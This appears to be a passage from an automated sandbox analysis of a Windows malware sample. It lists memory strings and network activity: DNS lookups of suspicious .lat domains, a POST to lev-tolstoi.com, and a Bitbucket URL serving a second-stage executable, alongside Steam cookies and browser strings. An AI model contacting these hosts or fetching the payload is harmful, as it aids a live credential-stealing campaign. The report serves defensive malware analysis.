                Source: TmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001154000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=Nonesessionid=689cfb1813aab72f39f2bc09; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type35121Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveMon, 23 Dec 2024 06:26:23 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Control equals www.youtube.com (Youtube)
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2132726091.0000000001154000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: LRPC-3bc2bcf3ed6d7050e4a/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=Nonesessionid=689cfb1813aab72f39f2bc09; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type35121Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveMon, 23 Dec 2024 06:26:23 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Control equals www.youtube.com (Youtube)
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2132726091.0000000001154000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: a/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001192000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: d.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001154000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://checkout.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
                Source: global trafficDNS traffic detected: DNS query: sweepyribs.lat
                Source: global trafficDNS traffic detected: DNS query: grannyejh.lat
                Source: global trafficDNS traffic detected: DNS query: discokeyus.lat
                Source: global trafficDNS traffic detected: DNS query: necklacebudi.lat
                Source: global trafficDNS traffic detected: DNS query: energyaffai.lat
                Source: global trafficDNS traffic detected: DNS query: aspecteirs.lat
                Source: global trafficDNS traffic detected: DNS query: sustainskelet.lat
                Source: global trafficDNS traffic detected: DNS query: crosshuaht.lat
                Source: global trafficDNS traffic detected: DNS query: rapeflowwj.lat
                Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
                Source: global trafficDNS traffic detected: DNS query: lev-tolstoi.com
                Source: global trafficDNS traffic detected: DNS query: bitbucket.org
                Source: global trafficDNS traffic detected: DNS query: bbuseruploads.s3.amazonaws.com
                Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: lev-tolstoi.com
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001154000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:27060
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2408821041.0000000005B16000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2409146236.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000002.2690091376.0000000005B16000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2204940421.0000000005B39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2204940421.0000000005B39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2408821041.0000000005B16000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2409146236.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000002.2690091376.0000000005B16000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2408821041.0000000005B16000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2409146236.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000002.2690091376.0000000005B16000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2409381050.00000000011A4000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2409198579.000000000119C000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000002.2688182205.00000000011A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/codesigningrootr45.crl0U
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2408821041.0000000005B16000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2409146236.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000002.2690091376.0000000005B16000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2204940421.0000000005B39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2408821041.0000000005B16000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2409146236.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000002.2690091376.0000000005B16000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2204940421.0000000005B39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2204940421.0000000005B39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2408821041.0000000005B16000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2409146236.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000002.2690091376.0000000005B16000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2408821041.0000000005B16000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2409146236.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000002.2690091376.0000000005B16000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2204940421.0000000005B39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2204940421.0000000005B39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                Source: TmmiCE5Ulm.exe, 00000000.00000002.2691243318.0000000006179000.00000002.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2408821041.0000000005B3B000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2409055917.0000000005B3C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2204940421.0000000005B39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2408821041.0000000005B16000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2409146236.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000002.2690091376.0000000005B16000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2408821041.0000000005B16000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2409146236.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000002.2690091376.0000000005B16000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2408821041.0000000005B16000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2409146236.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000002.2690091376.0000000005B16000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2409381050.00000000011A4000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2409198579.000000000119C000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000002.2688182205.00000000011A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/codesigningrootr450F
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2408821041.0000000005B16000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2409146236.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000002.2690091376.0000000005B16000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/rootr30;
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2204940421.0000000005B39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2409381050.00000000011A4000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2409198579.000000000119C000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000002.2688182205.00000000011A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/codesigningrootr45.crt0A
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2408821041.0000000005B16000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2409146236.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000002.2690091376.0000000005B16000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/root-r3.crt06
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001192000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001192000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreement/
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001192000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
                Source: Amcache.hve.5.drString found in binary or memory: http://upx.sf.net
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2132585943.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valvesoftware.com/legal.htm
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2204940421.0000000005B39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2204940421.0000000005B39000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2156635804.0000000005AC1000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2156755347.0000000005ABE000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2156870694.0000000005ABE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001154000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2204525623.000000000118B000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001184000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
                Source: TmmiCE5Ulm.exe, 00000000.00000002.2688215527.00000000011B9000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000002.2690091376.0000000005B09000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2409438639.00000000011B8000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2409381050.00000000011A4000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2409146236.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2409198579.000000000119C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://aui-cdn.atlassian.com/
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2109217722.0000000001198000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2409198579.000000000119C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2409198579.000000000119C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2409198579.000000000119C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2409198579.000000000119C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2409198579.000000000119C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2409198579.000000000119C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/;
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2408821041.0000000005B06000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000002.2690091376.0000000005B06000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-pg=q
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2409198579.000000000119C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2409198579.000000000119C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com/
                Source: TmmiCE5Ulm.exe, 00000000.00000002.2687870915.0000000001188000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2408821041.0000000005B06000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000002.2690091376.0000000005B01000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2408821041.0000000005B00000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000002.2688215527.00000000011B9000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000002.2690091376.0000000005B06000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000002.2690091376.0000000005B09000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2409438639.00000000011B8000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000002.2687870915.0000000001143000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2409146236.00000000011A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bbuseruploads.s3.amazonaws.com/70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2409146236.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000002.2688197419.00000000011AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2409146236.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000002.2688197419.00000000011AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/TU
                Source: TmmiCE5Ulm.exe, TmmiCE5Ulm.exe, 00000000.00000002.2687870915.0000000001113000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000002.2688164936.000000000119C000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2334259914.0000000001199000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2409198579.000000000119C000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2334313230.0000000001113000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exe
                Source: TmmiCE5Ulm.exe, 00000000.00000002.2687761991.0000000000DDA000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exe.0.0
                Source: TmmiCE5Ulm.exe, 00000000.00000002.2687870915.0000000001149000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exe_1
                Source: TmmiCE5Ulm.exe, 00000000.00000002.2688164936.000000000119C000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2409198579.000000000119C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exef
                Source: TmmiCE5Ulm.exe, 00000000.00000002.2687870915.0000000001128000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bitbucket.org:443/mynewworkspace123312/scnd/downloads/FormattingCharitable.exe
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2206551720.0000000005B03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2206551720.0000000005B03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001154000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://broadcast.st.dl.eccdnx.com
                Source: TmmiCE5Ulm.exe, 00000000.00000002.2688215527.00000000011B9000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000002.2690091376.0000000005B09000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2409438639.00000000011B8000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2409381050.00000000011A4000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2409146236.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2409198579.000000000119C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.cookielaw.org/
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2156635804.0000000005AC1000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2156755347.0000000005ABE000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2156870694.0000000005ABE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001154000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2204525623.000000000118B000.00000004.00000020.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2109270676.0000000001184000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/
                Source: TmmiCE5Ulm.exe, 00000000.00000003.2156635804.0000000005AC1000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2156755347.0000000005ABE000.00000004.00000800.00020000.00000000.sdmp, TmmiCE5Ulm.exe, 00000000.00000003.2156870694.0000000005ABE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
